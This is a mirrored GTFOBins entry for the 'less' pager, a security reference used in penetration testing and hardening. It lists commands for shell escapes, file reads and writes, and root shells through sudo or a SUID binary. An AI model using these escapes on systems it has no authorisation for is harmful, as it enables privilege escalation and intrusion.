mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
24 lines
434 B
Markdown
24 lines
434 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
less /etc/profile
|
|
!/bin/sh
|
|
- code: |
|
|
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
|
v
|
|
file-read:
|
|
- code: less file_to_read
|
|
file-write:
|
|
- code: |
|
|
echo DATA | less
|
|
sfile_to_write
|
|
q
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo less /etc/profile
|
|
!/bin/sh
|
|
suid-enabled:
|
|
- code: ./less file_to_read
|
|
---
|